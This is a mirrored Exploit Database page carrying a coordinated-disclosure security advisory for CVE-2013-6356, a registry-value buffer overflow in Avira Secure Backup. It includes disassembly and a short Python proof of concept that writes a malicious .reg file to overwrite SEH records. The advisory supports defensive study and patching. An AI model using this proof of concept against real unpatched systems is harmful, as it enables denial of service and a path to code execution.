Avira Secure Backup 1.0.0.1 Build 3616 – ‘.reg’ Buffer Overflow

• Exploit Database
• 103 阅读

• 作者： Julien Ahrens
  日期： 2013-11-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/29671/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187

  RCE Security Advisory http://www.rcesecurity.com 1. ADVISORY INFORMATION ----------------------- Product:Avira Secure Backup Vendor URL: www.avira.com Type: Improper Restriction of Operations within the Bounds of a Memory Buffer [CWE-119] Date found: 2013-10-30 Date published: 2013-11-16 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE:CVE-2013-6356 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED -------------------- Avira Secure Backup v1.0.0.1 Build 3616 4. VULNERABILITY DESCRIPTION ---------------------------- A buffer overflow vulnerability has been identified in Avira Secure Backup v1.0.0.1 Build 3616. The application loads the values of the Registry Keys "AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from "HKEY_CURRENT_USER\Software\Avira Secure Backup" on startup but does not properly validate the length of the fetched values before using them in the further application context, which leads to a buffer overflow condition with possible persistent code execution. The application queries the values via a RegQueryValueExW call and a fixed buffer pointer (lpData) and a fixed buffer size pointer (lpcbData). If the input string size is greater than the predefined size, the application uses a second RegQueryValueExW call with the new buffer size set to the length of the input string, but reuses the original buffer pointer (lpData), which has not been resized. This results in overwriting memory space inlcuding SEH - records. An attacker needs to force the victim to import an arbitrary .reg file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition. The attack scenario is persistent, because the code is executed as long as the manipulated values are loaded into the Registry. 5. DEBUG INFORMATION -------------------- Call stack of main thread AddressReturns to Procedure / arguments Called from 0012EB48 77DA6F87 <JMP.&ntdll.memmove>ADVAPI32.77DA6F82 0012EB4C 0012ECBC dest = 0012ECBC 0012EB50 0015760C src = 0015760C 0012EB54 00002712 n = 2712 (10002.) 0012EC28 77DA708B ADVAPI32.77DA6E02 ADVAPI32.77DA7086 0012EC60 0043F15D Includes ADVAPI32.77DA708BAvira_Se.0043F15B 0012EC9C 0043F3F8 Avira_Se.0043F0D2 Avira_Se.0043F3F3 0012F5B4 00CC00CC *** CORRUPT ENTRY *** The vulnerable code part of Avira Secure Backup.exe: 0043F0D2PUSH EBP 0043F0D3MOV EBP,ESP 0043F0D5SUB ESP,10 0043F0D8PUSH EBX 0043F0D9PUSH ESI 0043F0DAMOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; ADVAPI32.RegOpenKeyExW 0043F0E0PUSH EDI 0043F0E1LEA EAX,DWORD PTR SS:[EBP-8] 0043F0E4PUSH EAX ; /pHandle 0043F0E5PUSH 20019 ; |Access 0043F0EAXOR EBX,EBX; | 0043F0ECPUSH EBX ; |Reserved => 0 0043F0EDPUSH DWORD PTR SS:[EBP+C]; |Subkey 0043F0F0MOV BYTE PTR SS:[EBP-1],BL ; | 0043F0F3PUSH DWORD PTR SS:[EBP+8]; |hKey 0043F0F6MOV DWORD PTR SS:[EBP-C],820 ; | 0043F0FDCALL ESI ; \RegOpenKeyExW 0043F0FFMOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; ADVAPI32.RegQueryValueExW 0043F105TEST EAX,EAX 0043F107JNZ SHORT Avira_Se.0043F133 0043F109LEA EAX,DWORD PTR SS:[EBP-C] 0043F10CPUSH EAX ; /pBufSize 0043F10DPUSH DWORD PTR SS:[EBP+14] ; |Buffer 0043F110LEA EAX,DWORD PTR SS:[EBP-10]; | 0043F113PUSH EAX ; |pValueType 0043F114PUSH EBX ; |Reserved => NULL 0043F115PUSH DWORD PTR SS:[EBP+10] ; |ValueName 0043F118PUSH DWORD PTR SS:[EBP-8]; |hKey 0043F11BCALL EDI ; \RegQueryValueExW 0043F11DTEST EAX,EAX 0043F11FJNZ SHORT Avira_Se.0043F125 0043F121MOV BYTE PTR SS:[EBP-1],1 0043F125PUSH DWORD PTR SS:[EBP-8]; /hKey 0043F128CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 0043F12ECMP BYTE PTR SS:[EBP-1],BL 0043F131JNZ SHORT Avira_Se.0043F16E 0043F133LEA EAX,DWORD PTR SS:[EBP-8] 0043F136PUSH EAX 0043F137PUSH 20119 0043F13CPUSH EBX 0043F13DPUSH DWORD PTR SS:[EBP+C] 0043F140PUSH DWORD PTR SS:[EBP+8] 0043F143CALL ESI 0043F145TEST EAX,EAX 0043F147JNZ SHORT Avira_Se.0043F16E 0043F149LEA EAX,DWORD PTR SS:[EBP-C] 0043F14CPUSH EAX 0043F14DPUSH DWORD PTR SS:[EBP+14] 0043F150LEA EAX,DWORD PTR SS:[EBP-10] 0043F153PUSH EAX 0043F154PUSH EBX 0043F155PUSH DWORD PTR SS:[EBP+10] 0043F158PUSH DWORD PTR SS:[EBP-8] 0043F15BCALL EDI 0043F15DTEST EAX,EAX 0043F15FJNZ SHORT Avira_Se.0043F165 0043F161MOV BYTE PTR SS:[EBP-1],1 0043F165PUSH DWORD PTR SS:[EBP-8]; /hKey 0043F168CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 0043F16EXOR EAX,EAX 0043F170CMP BYTE PTR SS:[EBP-1],BL 0043F173POP EDI 0043F174POP ESI 0043F175SETNE AL 0043F178POP EBX 0043F179LEAVE 0043F17ARETN 6. PROOF-OF-CONCEPT (CODE / EXPLOIT) ------------------------------------ Use the following code to exploit the vulnerability: #!/usr/bin/python file="poc.reg" junk1="\xCC" * 1240 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n" poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\"" try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; 7. SOLUTION ----------- Update to v1.0.0.2 Build 3630 or later 8. REPORT TIMELINE ------------------ 2013-10-30: Discovery of the vulnerability 2013-11-03: RCE Security sends first notification to vendor via mail with disclosure date set to 18. November 2013 2013-11-03: MITRE assigns CVE-2013-6356 for this issue 2013-11-04: Vendor ACKs the vulnerability 2013-11-10: RCE Security asks for a status 2013-11-11: Vendor expects to receive a fix the same day 2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356 2013-11-16: Coordinated Disclosure 9. REFERENCES ------------- http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/